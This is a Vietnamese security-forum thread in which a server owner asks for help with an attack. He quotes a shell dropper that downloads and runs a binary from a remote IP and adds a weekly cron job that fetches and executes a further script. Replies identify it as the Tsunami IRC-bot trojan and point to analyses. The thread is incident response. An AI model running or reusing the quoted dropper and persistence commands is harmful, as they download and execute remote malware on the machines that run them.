English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thủ thuật reverse engineering Nhờ các bác kiểm tra dùm em này  XML
  [Discussion]   Nhờ các bác kiểm tra dùm em này 16/12/2013 15:08:33 (+0700) | #1 | 279234
dancerhp
Member
[Minus]    0    [Plus]
Joined: 14/09/2009 12:22:00
Messages: 11
Offline
[Profile] [PM]
Em này em thấy dạo này nó hay tấn công sv của em, nằm tại địa chỉ: http://221.132.37.26/xx,

Nó tạo ra 1 cronjob như sau:
Code:
#!/bin/sh

cd /dev/shm
wget -q http://221.132.37.26/xx -O .xx
chmod +x .xx
./.xx

echo "@weekly wget -q http://221.132.37.26/scen -O /tmp/sh;sh /tmp/sh;rm -rd /tmp/sh" >> /tmp/corn
crontab /tmp/corn
rm -rf /tmp/corn

Nhờ các bác kiểm tra dùm xem nó đang cố làm trò gì với ạ.

Regard.
[Up] [Print Copy]
  [Discussion]   Nhờ các bác kiểm tra dùm em này 08/05/2014 12:44:49 (+0700) | #2 | 280577
hoangcuongflp
Member
[Minus]    0    [Plus]
Joined: 21/03/2014 06:42:47
Messages: 24
Offline
[Profile] [PM]
file anh gửi lên là định dạng ELF

tìm hiểu thêm tại http://elinux.org/Executable_and_Linkable_Format_(ELF)

cách phân tích xem tại http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/
Mình là 1 con gà trong công nghệ.
Nếu mình có nói gì làm bạn không vui thì mong bạn bỏ qua cho, vì cá nhân mình còn gà lắm, và mình có ý tốt thôi.
[Up] [Print Copy]
  [Discussion]   Nhờ các bác kiểm tra dùm em này 09/05/2014 10:11:32 (+0700) | #3 | 280583
[Avatar]
 bolzano_1989
Journalist
[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]
dancerhp, mình đang xem con malware này và cần thêm thông tin ngữ cảnh từ bạn.
Bạn liên lạc mình qua Facebook (mình đã pm bạn) hoặc email nhé.
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Discussion]   Nhờ các bác kiểm tra dùm em này 09/05/2014 16:36:40 (+0700) | #4 | 280584
Levis
Member
[Minus]    0    [Plus]
Joined: 14/03/2012 10:31:11
Messages: 27
Location: REPT
Offline
[Profile] [PM] [WWW] [MSN]
Con này Avast đã nhận diện là ELF-Tsunami.B-Trj
Một bài phân tích (có thể sẽ hữu ích) ở đây: http://blog.malwaremustdie.org/2013/05/story-of-unix-trojan-tsunami-ircbot-w.html
my personal blog:
http://www.ltops9.wordpress.com
(poor english level, but i'm trying to make better)
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|